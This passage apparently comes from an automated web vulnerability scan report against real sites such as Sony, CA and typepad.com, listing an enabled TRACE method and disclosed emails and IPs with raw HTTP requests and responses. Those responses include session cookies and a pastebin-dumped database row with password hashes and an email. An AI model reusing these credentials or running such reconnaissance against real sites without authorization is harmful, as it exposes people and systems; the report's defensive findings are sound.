HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:52 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... </script><script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"> </script>...[SNIP]... </script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... </script> <script language="javascript" src="http://widgets.dzone.com/links/widgets/zoneit.js"> </script>...[SNIP]... </form> <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>...[SNIP]... </h2> <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium"> </script>...[SNIP]... <div style="padding:6px; background-color:#ededed; border:1px solid #D6D3D3; width:634px; margin-top:12px;"><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>...[SNIP]... <!--//HARDCODED BY JCROCI 6/25/11 --> <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp"> </script>...[SNIP]... <!--bhauck 3/7/2010--> <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"> </script>...[SNIP]...
14. TRACE method is enabled
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.typepad.com
Path:
/
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received. Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
Request
TRACE / HTTP/1.0 Host: www.typepad.com Cookie: 789027bdcab58768
Response
HTTP/1.0 200 OK Date: Tue, 06 Sep 2011 20:52:09 GMT Server: Apache Content-Type: message/http TRACE / HTTP/1.0 Host: www.typepad.com Cookie: 789027bdcab58768 X-Forwarded-For: 50.23.123.106, 10.17.141.102 X-6a-Remote: 10.17.141.102:39818 X-6a-Bticks: 0035524 X-6a-BTime: 632813362 Connection: keep-alive
15. Email addresses disclosed
previous
next
There are 9 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/?p=12640 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: application/x-javascript Last-Modified: Mon, 22 Aug 2011 01:04:54 GMT ETag: "1a4489-e81-4ab0daab8b980" X-Varnish: 1940592412 Cache-Control: max-age=14400 Expires: Tue, 06 Sep 2011 22:16:27 GMT Date: Tue, 06 Sep 2011 18:16:27 GMT Content-Length: 3713 Connection: close Vary: Accept-Encoding /*jslint browser: true */ /*global jQuery: true */ /** * jQuery Cookie plugin * * Copyright (c) 2010 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opens...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given key. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String key The key of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function (key, value, options) { // key and at least value given, set cookie... if (arguments.length >...[SNIP]...
15.2. http://pastebin.com/bq8xJPMn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The following email address was disclosed in the response:
Request
GET /bq8xJPMn HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:35 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 04-Oct-2011 18:10:35 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 373099 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <div class="de2">('1', 's0lar', 'bd1922cfd5641afff0790119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com ', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')</div>...[SNIP]... `mailflag_pmpub`, `mailflag_pmstaff`, `lastvisit`| ('1', 's0lar', 'bd1922cfd5641afff0790119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com ', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989') ======================== MySQL Information: ========...[SNIP]...
15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s
Response
HTTP/1.1 200 OK Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT Accept-Ranges: bytes ntCoent-Length: 34927 Content-Type: application/x-javascript Content-Length: 34927 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:34 GMT Connection: close Cache-Control: private // script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Ivan Krstic (htt...[SNIP]... <tdd@tddsworld.com >...[SNIP]...
15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
Issue detail
The following email address was disclosed in the response:sammi@oriontransfer.co.nz
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s
Response
HTTP/1.1 200 OK Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT Accept-Ranges: bytes ntCoent-Length: 31605 Content-Type: application/x-javascript Content-Length: 31605 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:34 GMT Connection: close Cache-Control: private // script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz ) // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/ if(Object.isUndefined(Effect)) thr...[SNIP]...
15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK Last-Modified: Fri, 12 Aug 2011 22:13:59 GMT Accept-Ranges: bytes ntCoent-Length: 35386 Content-Type: application/x-javascript Content-Length: 35386 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:33 GMT Connection: close Cache-Control: private /* SiteCatalyst code version: H.19.4. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ ...[SNIP]... 5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p=" +"`G@9^6^W`n`5!id@5s.tc @Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`" +"Q`k`8`4$Ns$90`Ud=^E;...[SNIP]...
15.6. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The following email addresses were disclosed in the response:john.smith@company.com pmfkey@ca.com
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:25:47 GMT Content-Length: 458334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <scri...[SNIP]... </a> and enter your email address (pmfkey@ca.com ) for your initial access.</p>...[SNIP]... <div class="formtip2 blue small">(john.smith@company.com )<br />...[SNIP]...
15.7. https://www.ca.com/us/register/forgotpassword.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/forgotpassword.aspx
Issue detail
The following email address was disclosed in the response:
Request
POST /us/register/forgotpassword.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/forgotpassword.aspx Content-Length: 2998 Cache-Control: max-age=0 Origin: https://www.ca.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351643167:ss=1315351389192 __VIEWSTATE=%2FwEPDwULLTE5NTE0OTU5ODEPZBYCAgEQZGQWCGYPZBYOAgkPFgQeBGhyZWYFImh0dHA6Ly93d3cuY2EuY29tL3VzL3Byb2R1Y3RzLmFzcHgeCWlubmVyaHRtbAUIcHJvZHVjdHNkAgoPFgQfAAUuaHR0cDovL3d3dy5jYS5jb20vdXMvY29tbXVuaX...[SNIP]...
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:27:40 GMT Content-Length: 29734 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta http-...[SNIP]... <input name="retriveEmail" type="text" id="retriveEmail" class="small formfieldwidth2" value="xss@xss.cx " />...[SNIP]...
15.8. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following email address was disclosed in the response:
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <p>CA Technologies employees, please use your email address (pmfkey@ca.com ) and click <a href="../register/forgotpassword.aspx">...[SNIP]...
15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/jslib/CalendarPopup.js
Issue detail
The following email address was disclosed in the response:
Request
GET /selfservice/jslib/CalendarPopup.js HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353074542
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"31095-1187921154000" Last-Modified: Fri, 24 Aug 2007 02:05:54 GMT Content-Type: text/javascript Content-Length: 31095 Date: Tue, 06 Sep 2011 18:51:06 GMT // =================================================================== // Author: Matt Kruse <matt@mattkruse.com > // WWW: http://www.mattkruse.com/ // // NOTICE: You may use this code for any purp...[SNIP]...
16. Private IP addresses disclosed
previous
next
There are 5 instances of this issue:
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways. Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
